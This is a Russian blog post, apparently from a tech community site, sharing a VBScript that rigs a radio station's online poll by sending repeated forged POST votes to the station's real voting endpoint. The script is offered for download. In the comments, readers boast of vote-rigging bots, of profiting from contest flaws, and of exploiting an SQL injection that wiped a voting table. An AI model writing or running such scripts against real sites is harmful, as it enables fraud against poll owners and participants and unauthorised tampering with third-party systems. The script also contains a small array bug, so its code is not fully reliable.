Накрутка одного опроса

    imageОднажды я зашел на сайт Радио Рок 95.2 FM и увидел там голосование. В результате его голосования родился just4fun-VB-скрипт (ничего другого не нашлось под рукой), который накручивает на нужное количество голосов нужный вариант.
    Option Explicit<br><br>Dim objHTTP, i, Num, Cnt<br><br>WScript.StdOut.WriteLine "95i2.fm voiting attack"<br>WScript.StdOut.WriteLine<br><br>' init ---><br>Dim v(3), v_descr(3)<br><br>v(0) = "%C2%20%EC%E0%F8%E8%ED%E5"<br>v_descr(0) = "В машине"<br><br>v(1) = "%20%CD%E0%20%F0%E0%E1%EE%F2%E5"<br>v_descr(1) = " На работе"<br><br>v_descr(2) = "%20%C4%EE%EC%E0"<br>v_descr(2) = " Дома"<br><br>v(3) = "%20%C2%20%EF%EB%E5%E5%F0%E5"<br>v_descr(3) = " В плеере"<br>' <--- init<br><br>' variants menu ---><br>Dim n, c<br>n = 0<br>For Each c In v <br>  WScript.StdOut.WriteLine n & ". " & """" & v_descr(n) & """"<br>  n = n + 1<br>Next<br>' <--- variants menu<br><br>WScript.StdOut.WriteLine<br>WScript.StdOut.Write "Enter variant for upgrade and press Enter: "<br>Num = WScript.StdIn.Read(3)<br><br>If CInt(Num) <= (UBound(v) + 1) Then<br> WScript.StdOut.WriteLine "Ok. Your choice: " & """" & v_descr(Num) & """"<br> <br> WScript.StdOut.WriteLine<br> WScript.StdOut.Write "Enter count for upgrade: "<br> Cnt = WScript.StdIn.Read(3)<br> <br> ' atack! ---><br> If CInt(Cnt) > 0 Then <br>  For i = 1 To Cnt<br>   WScript.StdOut.Write "Request: " & i & "... "<br>   <br>   Set objHTTP = CreateObject("MSXML2.XMLHTTP") <br>   objHTTP.Open "POST", "http://95i2.fm/index.php?mod=voting", False<br>   <br>   objHTTP.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"<br>   objHTTP.setRequestHeader "Host", "95i2.fm"<br>   objHTTP.setRequestHeader "Referer", "http://95i2.fm/index.php"<br>   <br>   objHTTP.send "variant=" & v(Num)<br>   <br>   Set objHTTP = Nothing<br>   WScript.StdOut.WriteLine "Ok"<br>  Next<br>  WScript.StdOut.WriteLine<br>  WScript.StdOut.WriteLine "All done!"<br> Else<br>  WScript.StdOut.WriteLine """" & CInt(Cnt) & """" & " - is incorrect value"<br> End If ' <--- atack! <br>End If<br><br>WScript.StdOut.WriteLine<br>Wscript.StdOut.Write "Press the Enter to continue."<br>Do While Not WScript.StdIn.AtEndOfLine<br>  Input = WScript.StdIn.Read(2)<br>Loop<br><br>* This source code was highlighted with Source Code Highlighter.
    Скачать скрипт

    Запускается так:


    а выглядит всё это дело примерно так:


    Да простят меня администраторы подопытного сайта.
    AdBlock похитил этот баннер, но баннеры не зубы — отрастут

    Подробнее
    Реклама

    Комментарии 7

      +1
      Ну очень многие голосования имеют такие изъяны, намного интересней писать, если в голосовании встроена какая нибудь защита от накруток (не по ip). А так тоже балуюсь иногда подобными чтуками, вплоть до того, что пару раз писал программку, которая регистрировалась на сайте, потом активировала аккаунт по email, авторизировалась и голосовала :).
      Правда такие способы накруток хорошо распознаваемы, особенно если на сервере есть нормальное логирование и имеют не особо много практического применения.
      Так же многие конкурсы в имеют много дыр, есть у меня в отдаленных планах написать про пару таких, сразу как только конкурс закончится и я получу свой профит )))))
        +1
        мне кажется, скрипт не надо было выкладывать.
        хоть он и не будет работать с другим голосованием.
          0
          Моей целью было как раз сделать это программно. Вот и получился ещё один пример кода на VBscript. Полагаю, что даже если каждый запустит этот скрипт, то ничего плохого не произойдёт :)
          0
          Сайтику неделя от роду, а вы его ломать тут же
          вот вернут вам чёрно-белую страничку на ХТМЛе как раньше…
            0
            Сломать я его точно не сумею, но даже моих малых познаний достаточно, чтобы определить, что сайт довольно-таки кривой :)
            +1
            а еще они исходники фоток выкладывают на главной в виде превьюшек…
              +1
              ых… давным давно Bacardi DJ проводили конкурс среди «диджеев». пришлось помочь товарищу :)
              правда получился казус, перед окончанием конкурса я нашел у них SQL-инъекцию и случайно потер таблицу с голосованием… в итоге не успели добрать очков за оставшееся время до желаемого приза, хотя шли с специально поддерживаемым небольшим отрывом :(

              Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.